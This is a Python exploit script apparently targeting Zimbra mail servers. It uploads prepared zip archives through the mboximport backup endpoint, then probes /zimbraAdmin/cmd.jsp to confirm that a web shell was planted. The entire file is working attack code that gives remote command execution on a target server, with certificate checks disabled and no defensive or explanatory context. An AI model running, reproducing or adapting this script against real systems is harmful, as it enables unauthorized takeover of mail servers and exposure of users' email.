import requests
import sys 
import os


from urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)

exploit_path = ["service/extension/backup/mboximport?account-name=valid_email&account-status=1&ow=cmd", "service/extension/backup/mboximport?account-name=valid_email&ow=2&no-switch=1&append=1"]
shell_list = ["312.zip", "313.zip", "314.zip"]




def sendExploit(host, filename, url):
	
	data_payload = open(filename, 'rb')
	# f = {'file': open(filename, 'rb')}

	headers = {'content-type': 'application/x-www-form-urlencoded'}
	# proxy = {"http":"http://192.168.1.2:8080",
	# 		"https":"https://192.168.1.2:8080"}

	proxy = {}

	try:
		resp = requests.post(host, timeout=20, data=data_payload, proxies=proxy, verify=False, headers=headers)
		
		print(resp.status_code)

		if resp.status_code == 401:
			stautus = checkShell(url)
			if stautus == 200:
				return
	except Exception as e:
		print(e)
		pass

	data_payload.close()


def checkShell(url):

	host = url + "/zimbraAdmin/cmd.jsp"
	print("Checking url " + url)
	resp = requests.get(host,verify=False, timeout=20)

	if resp.status_code == 200:
		print("[+] Success shell: " + host)
	else:
		print("[+] Fail to get shell")

	return resp.status_code

def main():

	url = sys.argv[1]
	email = sys.argv[2]

	if len(sys.argv) < 3:
		print("[+] Example python3 zimbra-exploit.py https://mail.example.com [email protected]")
	

	for path in exploit_path:
		path = path.replace("valid_email", email)
		host = url + "/" + path

		for shell in shell_list:
			shell_zip = os.getcwd() + "/" + shell
			sendExploit(host, shell_zip, url)

if __name__ == '__main__':
	main()